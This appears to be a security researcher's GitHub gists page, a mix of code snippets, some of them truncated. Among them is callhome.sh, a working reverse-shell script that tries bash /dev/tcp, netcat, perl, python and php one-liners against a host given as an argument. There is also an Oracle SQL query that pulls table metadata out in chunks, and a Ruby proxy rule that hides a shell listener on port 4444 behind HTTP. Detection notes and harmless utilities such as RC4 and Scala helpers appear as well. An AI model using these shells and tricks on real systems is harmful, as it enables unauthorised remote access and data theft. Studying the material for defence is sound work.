Chris Frohoff frohoff

  • San Diego, CA
View oracle_chunked_xml_exfil.sql
-- Visible part of a query that returns one large XML document as a series of
-- VARCHAR rows. The listing is cut off after the row generator starts, so the
-- join condition and the closing parentheses are not shown here.
--   * dbms_xmlgen.getxml(...) renders the result of the quoted query
--     (here: all_tables) as a single XML LOB, aliased c.
--   * t carries that LOB plus a row number r and its length l
--     (dbms_lob.getlength).
--   * n supplies zero-based chunk indexes i (rownum - 1).
--   * dbms_lob.substr(t.c, 4000, n.i * 4000 + 1) takes the i-th slice of up to
--     4000 characters; the cast makes each slice an ordinary varchar(4000).
-- NOTE(review): calls to dbms_xmlgen.getxml in application-originated SQL are
-- worth auditing, and EXECUTE on DBMS_XMLGEN is worth reviewing for accounts
-- that do not need it -- confirm against your own baseline.
select c from (
select cast(dbms_lob.substr(t.c, 4000, (n.i) * 4000 + 1) as varchar(4000)) c, t.r i, n.i j
from ((
select rownum r, dbms_lob.getlength(c) l, c
from (
select dbms_xmlgen.getxml('select * from all_tables') c
from dual)
) t inner join (
select rownum - 1 as i
from dual
frohoff / print_rails_cookie.sh
Last active Dec 15, 2015
print contents of rails cookie
View rails_cookie_rce.rb
frohoff / callhome.sh
Last active Oct 27, 2018
Shell script that attempts multiple methods for creating a reverse shell
#!/bin/bash
# Takes two positional arguments, a host ($1) and a port ($2), and runs five
# one-liners in sequence. Each one tries to attach an interactive shell to a
# TCP connection to host:port.
# There are no exit-status checks: every command runs as soon as the previous
# one returns, whether or not it connected.
# $host and $port are expanded unquoted and are spliced into the perl, python
# and php source text, so those interpreters see them as part of the program.
#
# What this looks like in telemetry (for detection engineering):
#   - command lines containing /dev/tcp/, "nc -e", or an interpreter one-liner
#     that opens a socket and then executes /bin/sh
#   - a bash/sh -i process whose stdin, stdout and stderr are a TCP socket
#   - an outbound connection initiated by a host that normally only accepts
#     connections (egress filtering and flow logs cover this case)
host=$1
port=$2
# bash: interactive shell with all three standard streams redirected to
# bash's /dev/tcp/<host>/<port> pseudo-path.
bash -i >& /dev/tcp/$host/$port 0>&1
# netcat: -e asks nc to run /bin/sh with its I/O on the connection.
nc -e /bin/sh $host $port
# perl: opens a TCP socket, re-opens STDIN/STDOUT/STDERR onto it, then execs
# /bin/sh -i. The exec only happens if connect() succeeds.
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
# python: connects, dup2()s the socket onto descriptors 0, 1 and 2, then runs
# /bin/sh -i as a child via subprocess.call.
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
# php: fsockopen() then /bin/sh -i with its streams redirected to descriptor 3;
# the one-liner assumes the socket it just opened is descriptor 3.
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
View hide-shell.rb
# Routing rule for a `proxy do |data| ... end` front end. The block returns the
# backend to use as { :remote => "host:port" }.
# `data` is whatever the surrounding proxy DSL passes in (presumably the first
# bytes received from the client -- confirm against the proxy library in use).
#
# Input containing an HTTP method name followed by a space goes to
# localhost:81; everything else goes to localhost:4444.
# NOTE(review): the pattern is unanchored, so the verb may match anywhere in
# `data`, not only at the start of a request line.
#
# Defender's view: the fronted port answers ordinary HTTP and relays any other
# byte stream to a second local listener. Probing a public port with non-HTTP
# input and inventorying local listeners (here 81 and 4444) exposes this split.
proxy do |data|
  http_verb = /(GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|CONNECT|PATCH) /
  backend = (data =~ http_verb) ? "localhost:81" : "localhost:4444"
  { :remote => backend }
end
View gogrep.go
package main
import (
"fmt"
"os"
"bufio"
"regexp"
"io"
)
frohoff / longchaintest.js
Last active Aug 29, 2015
long stream chain test
// Node's built-in crypto module (its use is in the part of the script not
// shown in this listing).
var crypto = require('crypto')
// Hash algorithm name: first command-line argument, default 'sha1'.
var hashType = process.argv[2] || 'sha1'
// Number of chained hash stages: second command-line argument, default 1.
// NOTE(review): parseInt is called without a radix and the result is not
// validated, so a non-numeric argument yields NaN.
var numHashes = parseInt(process.argv[3] || 1)
// init chain with stdout
var piped = process.stdout
for (var i = 0; i < numHashes; i++) {
// prepend chain with new hash
View nullsafe.scala
object NullSafeConversions {
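/**
 * Implicit conversion that wraps any value in [[NullSafe]], making the
 * null-guarded `?` operator available on it.
 *
 * The result type is declared explicitly so the conversion stays eligible
 * regardless of where in the file it is used; Scala 3 also requires this of
 * implicit definitions.
 */
implicit def ns[A](a: A): NullSafe[A] = new NullSafe(a)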
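/**
 * Implicit conversion that wraps an `Option` in [[RichOption]].
 *
 * The result type is declared explicitly so the conversion stays eligible
 * regardless of where in the file it is used; Scala 3 also requires this of
 * implicit definitions.
 */
implicit def ro[A](o: Option[A]): RichOption[A] = new RichOption(o)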
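/**
 * Lifts a possibly-null reference into an `Option`.
 *
 * @param a value that may be `null`
 * @return `Some(a)` when `a` is non-null, `None` when it is `null`
 */
// The earlier condition was inverted (`a == null` produced `Some(a)`), which
// gave Some(null) for null input and None for every real value.
def ?[A](a: A): Option[A] = Option(a)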
/**
 * Value-class wrapper that adds a null-guarded application operator to any value.
 *
 * @param a the wrapped value, which may be `null`
 */
case class NullSafe[A](a: A) extends AnyVal {

  /**
   * Applies `f` to the wrapped value unless that value is `null`.
   *
   * @param f function to run on a non-null value
   * @return `f(a)` when `a` is non-null, otherwise `null`
   */
  def ?[B >: Null](f: A => B): B = {
    val absent = a == null
    if (absent) null else f(a)
  }
}
case class RichOption[A](o:Option[A]) extends AnyVal {
frohoff / terse-rc4.rb
Last active Aug 29, 2015
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
# RC4 written as a single lambda taking (t, k).
#   t: the input, mapped element by element and XORed with the keystream.
#   k: the key, read via k[i % k.size].
#   Both are presumably arrays of byte values (0..255) -- confirm with callers.
# The m.times loop is the key schedule over the 256-entry state s. The t.map
# block then produces one keystream value per input element and XORs the two.
# NOTE: RC4 has known keystream biases and RFC 7465 prohibits it in TLS. Read
# this as a code-size exercise, not as a cipher for protecting data.
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}
frohoff / Flow.scala
Last active Aug 29, 2015
monadish reactive flow combinators
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet